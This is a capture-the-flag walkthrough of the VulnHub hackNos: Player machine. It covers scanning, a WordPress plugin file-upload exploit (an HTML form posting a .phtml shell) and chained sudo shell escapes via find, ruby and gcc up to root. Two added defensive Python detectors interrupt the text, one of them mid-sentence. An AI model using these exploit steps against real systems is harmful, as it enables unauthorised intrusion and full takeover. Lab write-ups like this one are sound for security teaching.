(VulnHub) hackNos: Player WriteUp — WalkThrough

AB2
8 min read, Apr 13, 2020


VulnHub Link: https://www.vulnhub.com/entry/hacknos-player,459/

http://192.168.9.105/

A default apache2 page appears …

Nmap Scan:

> nmap -sC -sV 192.168.9.105 --unprivileged
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 17:55 W. Central Africa Standard Time
Strange read error from 192.168.9.105 (203 - 'Unknown error')
Strange read error from 192.168.9.105 (203 - 'Unknown error')
Nmap scan report for 192.168.9.105
Host is up (1.0s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd (broken: not found: directory given in 'secure_chroot_dir':/var/ftp/vsftpd)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
543/tcp filtered klogin
3306/tcp open mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
| Thread ID: 38
| Capabilities flags: 63486
| Some Capabilities: FoundRows, Support41Auth, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsTransactions, IgnoreSigpipes, InteractiveClient, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, Speaks41ProtocolOld, ODBCClient, ConnectWithDatabase, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: 9Svy{|~%8)d@QU7S};JE
|_ Auth Plugin Name: mysql_native_password
5051/tcp filtered ida-agent
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.45 seconds

We have 3 open ports:

FTP + APACHE + MYSQL

I ran a quick DirBuster but got nothing back! …

I ran another nmap scan over all ports, then went back to the apache2 default page and started doing some things manually, like looking at the source code ….

Something was weird!

The default Debian document root is /var/www/html/g@web. 
You can make your own virtual hosts under /var/www/mini@web.
This is different to previous releases which provides better security out of the box.

http://192.168.9.105/g@web/

We have a WordPress script here! …

I ran a quick wpscan (the log below isn’t complete, I kept only the interesting parts … and it’s an old version of wpscan)

> wpscan -u http://192.168.9.105/g@web/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]n
[+] URL: http://192.168.9.105/g@web/
[+] Started: Wed Apr 8 18:10:58 2020
[!] The WordPress 'http://192.168.9.105/g@web/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.9.105/g@web/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://192.168.9.105/g@web/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.38 (Debian)
[!] Registration is enabled: http://192.168.9.105/g@web/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.9.105/g@web/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.9.105/g@web/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.9.105/g@web/wp-includes/
......[+] Name: wp-support-plus-responsive-ticket-system - v7.1.3
| Location: http://192.168.9.105/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Readme: http://192.168.9.105/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
[!] The version is out of date, the latest version is 9.1.2
[!] Directory listing is enabled: http://192.168.9.105/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/
[!] Title: WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8699
Reference: http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
Reference: https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system
Reference: https://www.exploit-db.com/exploits/40939/
[i] Fixed in: 8.0.0
[!] Title: WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)
Reference: https://wpvulndb.com/vulnerabilities/8949
Reference: https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
[i] Fixed in: 8.0.8
..........

I had to run another one on my Kali Linux with the new version

root@x00xKaliLinux:~# wpscan --url http://192.168.9.105/g@web/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.11
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.9.105/g@web/ [192.168.9.105]
[+] Started: Thu Apr 9 21:20:20 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.9.105/g@web/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.9.105/g@web/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Registration is enabled: http://192.168.9.105/g@web/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.9.105/g@web/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.9.105/g@web/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Latest, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.9.105/g@web/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.9.105/g@web/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.9.105/g@web/wp-content/themes/twentyseventeen/
| Latest Version: 2.3 (up to date)
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://192.168.9.105/g@web/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://192.168.9.105/g@web/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.9.105/g@web/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] wp-local
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.9.105/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

By going to this link:

http://192.168.9.105/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1

we got something …

"you can upgrade you shell using hackNos@9012!!"

I tried it as the password for the user but nothing :(

So I had to go back to the old wpscan log above, because I had noticed an RCE exploit there (https://wpvulndb.com/vulnerabilities/8949)

<form method="post" enctype="multipart/form-data" action="http://192.168.9.105/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>

By putting the code above in an HTML file, browsing to it and then choosing the phtml file/shell to upload …

we got this JSON:

{"isError":"0","errorMessege":"done","attachment_id":"1"}

and by going to

http://192.168.9.105/g@web/wp-content/uploads/wpsp/

You’ll find the PHTML file :D

So now I have to upload my PHP shell and run it :D (without forgetting to start the listener)

After this, let’s start enumerating to get root …

As a start, and as always, I check whether there are any sudo binaries by running
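From the defender's side, the upload trick above leaves a distinctive trace: a script-type file served with a 2xx status from under wp-content/uploads/, often right after a directory listing of the plugin's upload folder. The following detector is an added example, not code from the writeup; the access log lines it parses are constructed to mirror the paths used on this box.

```python
import re
from urllib.parse import urlsplit

# Constructed sample Apache access log lines modelled on the upload path used in the
# writeup (not real logs from the machine).
SAMPLE_LOG = """\
10.0.0.5 - - [09/Apr/2020:21:30:01 +0100] "GET /g@web/ HTTP/1.1" 200 7113
10.0.0.5 - - [09/Apr/2020:21:30:09 +0100] "POST /g@web/wp-admin/admin-ajax.php HTTP/1.1" 200 58
10.0.0.5 - - [09/Apr/2020:21:30:15 +0100] "GET /g@web/wp-content/uploads/wpsp/ HTTP/1.1" 200 942
10.0.0.5 - - [09/Apr/2020:21:30:20 +0100] "GET /g@web/wp-content/uploads/wpsp/shell.phtml?cmd=id HTTP/1.1" 200 131
10.0.0.7 - - [09/Apr/2020:21:31:02 +0100] "GET /g@web/wp-content/uploads/2020/04/logo.png HTTP/1.1" 200 4021
"""

# Common log format: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# Extensions a default mod_php setup may execute (.phtml is the one the plugin accepted).
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".phps")


def parse_line(line):
    """Return a dict for one access log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    # urlsplit drops the query string so "?cmd=id" does not hide the extension
    return {"ip": ip, "ts": ts, "method": method,
            "path": urlsplit(target).path, "status": int(status)}


def find_upload_executions(log_text):
    """Flag successful requests that executed a script-type file from wp-content/uploads,
    plus successful directory listings of the uploads tree (4xx/5xx are ignored)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["status"] >= 400:
            continue
        path = rec["path"]
        if "/wp-content/uploads/" not in path:
            continue
        if path.lower().endswith(SCRIPT_EXT):
            findings.append((rec["ip"], path, "script executed from uploads dir"))
        elif path.endswith("/"):
            findings.append((rec["ip"], path, "directory listing of uploads"))
    return findings
```

The matching hardening is to refuse script handlers and directory indexes under wp-content/uploads in the vhost configuration, so the second finding type cannot occur at all.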

sudo -l

security@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -l
sudo -l
Matching Defaults entries for security on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User security may run the following commands on hacknos:
(hacknos-boat) NOPASSWD: /usr/bin/find

So to jump to hacknos-boat we go back to GTFOBins,

and for the find binary it says

find . -exec /bin/sh -p \; -quit

I changed sh to bash for a better shell and ran it

security@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -u hackNos-boat find . -exec /bin/bash -p \; -quit
< -u hackNos-boat find . -exec /bin/bash -p \; -quit
hackNos-boat@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$

We are hackNos-boat now :D (the upper-case N is required)

Now doing the same as before, i.e. sudo -l

hackNos-boat@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -l
sudo -l
Matching Defaults entries for hackNos-boat on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User hackNos-boat may run the following commands on hacknos:
(hunter) NOPASSWD: /usr/bin/ruby

and from GTFOBins

ruby -e 'exec "/bin/sh"'

The same operation as before: change sh to bash

hackNos-boat@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'
<p$ sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'
hunter@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$

and we are hunter now :p

I remembered that there was a file in hunter’s home directory

hunter@hacknos:~$ cat user.txt
cat user.txt
MD5USER: 4676cd2e30b6d0b8650d14a5dd9f16c3

I tried to crack it but got nothing back … let’s do what we did for the previous users, maybe we’ll get root

with the same operation …

hunter@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -l
sudo -l
Matching Defaults entries for hunter on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User hunter may run the following commands on hacknos:
(ALL) NOPASSWD: /usr/bin/gcc

It was clear from the beginning, so from GTFOBins:

sudo gcc -wrapper /bin/sh,-s .

By changing sh to bash again :p and running that

hunter@hacknos:~$ sudo gcc -wrapper /bin/bash,-s .
sudo gcc -wrapper /bin/bash,-s .
root@hacknos:/home/hunter# id
id
uid=0(root) gid=0(root) groups=0(root)
root@hacknos:/home/hunter#

We are R00T :D
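The whole privilege escalation is three sudo rules chained together, each granting a binary that GTFOBins lists with a shell escape. As an added example (not part of the writeup), the script below parses sudo -l output in the format shown above and walks the chain to see whether root is reachable; the sample rules are constructed from the three outputs on this page, and the shell-escape list is a small subset of GTFOBins, not the full catalogue.

```python
import re

# Constructed from the three `sudo -l` outputs in the writeup (sample input, not live data).
SUDO_L_OUTPUTS = {
    "security": "User security may run the following commands on hacknos:\n"
                "    (hacknos-boat) NOPASSWD: /usr/bin/find",
    "hackNos-boat": "User hackNos-boat may run the following commands on hacknos:\n"
                    "    (hunter) NOPASSWD: /usr/bin/ruby",
    "hunter": "User hunter may run the following commands on hacknos:\n"
              "    (ALL) NOPASSWD: /usr/bin/gcc",
}

# Binaries GTFOBins lists with a sudo shell escape; a subset relevant to this box.
SHELL_ESCAPE_BINS = {"find", "ruby", "gcc", "vim", "python", "perl", "awk", "less"}

# "(runas) NOPASSWD: /path/to/bin" or "(runas) /path/to/bin"
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*(?:NOPASSWD:\s*)?(\S+)", re.M)


def parse_rules(output):
    """Return (runas_user, binary_path) pairs found in one sudo -l output."""
    return [(m.group(1).strip(), m.group(2)) for m in RULE_RE.finditer(output)]


def escalation_path(outputs, start):
    """Follow rules whose binary offers a shell escape until (ALL) or root is reached.
    User names are compared case-insensitively: sudo -l printed 'hacknos-boat' on this
    box while the account the author had to use was 'hackNos-boat'."""
    by_lower = {u.lower(): u for u in outputs}
    path, cur, seen = [start], start, {start.lower()}
    while True:
        nxt = None
        for runas, binary in parse_rules(outputs.get(cur, "")):
            if binary.rsplit("/", 1)[-1] not in SHELL_ESCAPE_BINS:
                continue  # binary cannot be turned into a shell, rule is not a hop
            if runas.upper() == "ALL" or runas.lower() == "root":
                path.append("root")
                return path
            if runas.lower() in by_lower and runas.lower() not in seen:
                nxt = by_lower[runas.lower()]
                break
        if nxt is None:
            return path  # dead end: no further escalation from this user
        seen.add(nxt.lower())
        path.append(nxt)
        cur = nxt
```

Run on the three users it returns security, hackNos-boat, hunter, root, which is exactly the hop sequence followed above; the same parser run against a hardened sudoers (no shell-escape binaries) stops at the starting user.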

Hope you enjoyed my WriteUp / WalkThrough :D

Follow me on Twitter: https://twitter.com/ab2pentest
If you liked my writeup and want to support me for more:
https://www.buymeacoffee.com/ab2pentest
Other writeups and tools can be found here:
https://github.com/ab2pentest

Written by AB2

Security Engineer @ TS | Ethical Hacker | Content Creator | CTF Player.
